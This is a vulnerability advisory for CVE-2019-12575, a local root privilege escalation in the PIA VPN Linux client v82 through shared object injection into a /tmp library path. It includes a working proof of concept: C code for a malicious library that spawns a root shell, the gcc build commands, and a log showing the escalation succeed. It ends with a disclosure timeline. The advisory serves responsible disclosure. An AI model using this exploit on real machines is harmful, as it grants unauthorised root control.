Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

97 lines (62 sloc) 2.18 KB
Title: PIA Linux, macOS Privilege Escalation: Shared Object Injection
Author: Rich Mirch
CVE: CVE-2019-12575
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for Linux could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA Linux binary root_runner.64 is setuid root. This binary executes
/opt/pia/ruby/64/ruby which in turn attempts to load several libraries under
/tmp/ruby-deploy.old/lib. A local unprivileged user can create a malicious
library under this path to execute arbitrary code as the root user.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment
OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-29-generic
PIA Version: v82
Steps to reproduce
All steps are executed as a low privileged user.
Step 1 - Create the following directory
mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
Step 2 - Create woot.c to execute a shell when loaded
cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF
Step 3 - compile the malicious library.
gcc -fPIC -o woot.o -Wall -c woot.c
gcc -Wall \
-shared \
-Wl,-soname,encdb.so.so \
-Wl,-init,woot \
-o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
Step 4 - execute root_runner.64
/opt/pia/root_runner/root_runner.64
Example
user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ ./pia-ruby-exploit.sh
+ LIBPATH=/tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ cat
+ gcc -fPIC -o woot.o -Wall -c woot.c
+ gcc -Wall -shared -Wl,-soname,encdb.so.so -Wl,-init,woot -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
+ /opt/pia/root_runner/root_runner.64
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#
Timeline:
2018-12-16: Reported to vendor
2018-12-16: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83 however this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure
You can’t perform that action at this time.